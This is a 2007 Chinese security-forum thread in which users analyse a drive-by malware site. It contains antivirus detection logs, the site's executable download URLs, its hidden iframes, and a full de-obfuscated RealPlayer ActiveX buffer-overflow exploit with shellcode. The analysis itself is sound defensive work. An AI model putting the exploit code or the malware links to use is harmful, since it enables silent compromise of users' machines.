查看: 4122|回复: 17
收起左侧

[已鉴定] 毒网,谁来解密下

 关闭 [复制链接]
Redevil
发表于 2007-12-4 23:24:45 | 显示全部楼层 |阅读模式
http://9gg.biz/

附上网页

桌面.rar

2.99 KB, 下载次数: 167

nosferatu
头像被屏蔽
发表于 2007-12-4 23:37:17 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\桌面.rar'
C:\Documents and Settings\Administrator\桌面\桌面.rar
  [0] Archive type: RAR
  --> xl.htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Silly.Gen
      [INFO]      The file was deleted!
jimmyleo
发表于 2007-12-4 23:51:31 | 显示全部楼层
[exe]http://9gg.biz/1.exe

[exe]http://9gg.biz/real.exe

应该是同一个东西


antivir斩……

[ 本帖最后由 jimmyleo 于 2007-12-4 23:53 编辑 ]
capsshift
发表于 2007-12-4 23:54:35 | 显示全部楼层
红伞把脚本都拦截了,没机会下马了。
Redevil
 楼主| 发表于 2007-12-4 23:54:58 | 显示全部楼层
原帖由 jimmyleo 于 2007-12-4 23:51 发表
[exe]http://9gg.biz/1.exe

[exe]http://9gg.biz/real.exe

应该是同一个东西


antivir斩……


的确是同一个
3Q
jimmyleo
发表于 2007-12-4 23:57:42 | 显示全部楼层
那只是因为你没有这些漏洞 和antivir没有关系

antivir只是在有时会拦截脚本 其实是读到一半就报了 所以……
其实拦截的话 就要用s版的webguard了 那才是之前
其他版本的都是之后了……

不过有时会读到一半成为拦截的假象
所以我在上报上报……上报~
Oceanzd
发表于 2007-12-5 00:08:28 | 显示全部楼层
<iframe src=index.html width=0 height=0></iframe>
<iframe src=2.htm width=0 height=0></iframe>
<iframe src=xl.htm width=0 height=0></iframe>   
<script src='http://s68.cnzz.com/stat.php?id=701834&web_id=701834&show=pic1' language='JavaScript' charset='gb2312'></script>
xxl
发表于 2007-12-5 00:27:25 | 显示全部楼层
卡巴7.0报
检测到:恶意程序 Exploit.HTML.IESlice.av        URL: http://9gg.biz/xl.htm

2007-12-5 0:25:52        URL: http://9gg.biz/xl.htm        检测到恶意程序 'Exploit.HTML.IESlice.av'       
2007-12-5 0:25:52        URL: http://9gg.biz/xl.htm        拒绝访问
Graybird
发表于 2007-12-5 12:15:42 | 显示全部楼层
  1. function RealExploit()
  2. {
  3. var user = navigator.userAgent.toLowerCase();
  4. if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
  5. return;
  6. if(user.indexOf("nt 5.")==-1)
  7. return;
  8. VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
  9. try
  10. {
  11. Real = new ActiveXObject(VulObject);
  12. }catch(error)
  13. {
  14. return;
  15. }

  16. RealVersion = Real.PlayerProperty("PRODUCTVERSION");
  17. Padding = "";
  18. JmpOver = unescape("%75%06%74%04");
  19. for(i=0;i<32*148;i++)
  20. Padding += "S";

  21. if(RealVersion.indexOf("6.0.14.") == -1)
  22. {
  23. if(navigator.userLanguage.toLowerCase() == "zh-cn")
  24. ret = unescape("%7f%a5%60");
  25. else if(navigator.userLanguage.toLowerCase() == "en-us")
  26. ret = unescape("%4f%71%a4%60");
  27. else
  28. return;
  29. }
  30. else if(RealVersion == "6.0.14.544")
  31. ret = unescape("%63%11%08%60");
  32. else if(RealVersion == "6.0.14.550")
  33. ret = unescape("%63%11%04%60");
  34. else if(RealVersion == "6.0.14.552")
  35. ret = unescape("%79%31%01%60");
  36. else if(RealVersion == "6.0.14.543")
  37. ret = unescape("%79%31%09%60");
  38. else if(RealVersion == "6.0.14.536")
  39. ret = unescape("%51%11%70%63");
  40. else
  41. return;

  42. if(RealVersion.indexOf("6.0.10.") != -1)
  43. {
  44. for(i=0;i<4;i++)
  45. Padding = Padding + JmpOver;
  46. Padding = Padding + ret;
  47. }
  48. else if(RealVersion.indexOf("6.0.11.") != -1)
  49. {
  50. for(i=0;i<6;i++)
  51. Padding = Padding + JmpOver;
  52. Padding = Padding + ret;
  53. }
  54. else if(RealVersion.indexOf("6.0.12.") != -1)
  55. {
  56. for(i=0;i<9;i++)
  57. Padding = Padding + JmpOver;
  58. Padding = Padding + ret;
  59. }
  60. else if(RealVersion.indexOf("6.0.14.") != -1)
  61. {
  62. for(i=0;i<10;i++)
  63. Padding = Padding + JmpOver;
  64. Padding = Padding + ret;
  65. }

  66. AdjESP = "LLLL\\XXXXXLD";
  67. Shell ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoVYPgsWTnQr3Y3JVO6QTnauqhauOpwp";
  68. PayLoad = Padding + AdjESP + Shell;
  69. while(PayLoad.length < 0x8000)
  70. PayLoad += "ChuiZi";
  71. Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
  72. }
  73. RealExploit();
复制代码
Real漏洞~
啊弥陀佛
发表于 2007-12-5 14:29:48 | 显示全部楼层
微点砍掉
未命 名.JPG
未命名.JPG
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 04:54 , Processed in 0.149685 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表